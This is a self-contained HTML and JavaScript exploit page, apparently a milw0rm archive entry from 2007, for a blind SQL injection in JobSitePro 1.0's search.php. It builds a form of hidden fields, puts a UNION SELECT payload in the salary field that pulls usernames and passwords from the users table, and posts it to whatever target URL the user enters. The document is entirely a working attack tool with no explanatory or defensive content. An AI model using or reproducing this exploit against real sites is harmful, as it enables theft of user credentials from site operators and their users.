<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
</head>
<body>
<div>
<script language="JavaScript">
//Coded by ajann
//'===============================================================================================
//'[Script Name: JobSitePro 1.0 (search.php) Remote BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://phplabs.com/
//'[$$ : 39.95 $
//'[Using : Write Target after Submit Click
//'===============================================================================================
tittle='JobSitePro 1.0 (search.php) Remote BLIND SQL Injection Exploit'
value='"';
sql='1 union select 1,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,58),password),3 from users/*';
valueclose='">';
attack=value+sql+valueclose;
document.write('<title>' + tittle + '</title>')
document.write('<body bgcolor="#000000">');
document.write('<p><b><font face="Verdana" size="2" color="#008000">' + tittle + '</font></b></p>');
document.write('<form method="post" name="form1" action="http://phplabs.com/demo/jobsitepro/search.php" enctype="multipart/form-data" onSubmit="send();">');
document.write('<b><font color="#008000"><font face="Verdana" size="1">Target</font><font face="Verdana" size="1">[site.com/path]:</font></font></b>');
document.write('<form method="post" name="form1" action="a" enctype="multipart/form-data">')
document.write(' ')
document.write('<input type="text" name="hedef" value="http://" onChange="control();">')
document.write('<SELECT name="jobtype" style="visibility: hidden;">')
document.write('<OPTION value="all" SELECTED>All Categories</OPTION>')
document.write('</SELECT>')
document.write('<input name="city" type="text" id="city" size="45" style="visibility: hidden;">')
document.write('<select name="state" style="visibility: hidden;">')
document.write('<option value="all" selected>')
document.write('</option>')
document.write('</select>')
document.write('<select name="country" style="visibility: hidden;">')
document.write('<option value="US" selected>United States </option>')
document.write('</select>')
document.write('<input name="keywords" type="text" id="keywords" value=" " style="visibility: hidden;">')
document.write('<input name="boolean" type="radio" value="any" checked style="visibility: hidden;">')
document.write('<select name="date" id="date" style="visibility: hidden;">')
document.write('<option value="all" selected>List All Jobs</option>')
document.write('</select>')
document.write('<select name="exempt" id="exempt" style="visibility: hidden;">')
document.write('<option value="all" selected>Any</option>')
document.write('</select>')
document.write('<input name="salary" style="visibility: hidden;" type="text" id="salary" size="10" value=' + attack)
document.write('<select name="perpage" id="perpage" style="visibility: hidden;">')
document.write('<option value="25" selected>25</option>')
document.write('</select>')
document.write('<input name="act" type="hidden" id="act" value="dosearch">')
document.write('<br><input type="submit" name="Submit" value="Attack!!!!"')
document.write('</form>')
function control() {
if (document.form1.hedef.value==""){
alert("Please all fields correct!");
}
}
function send() {
target=document.form1.hedef.value;
file='search.php';
document.form1.action=target+file;
}
</script>
</div>
</body>
</html>
# milw0rm.com [2007-03-11]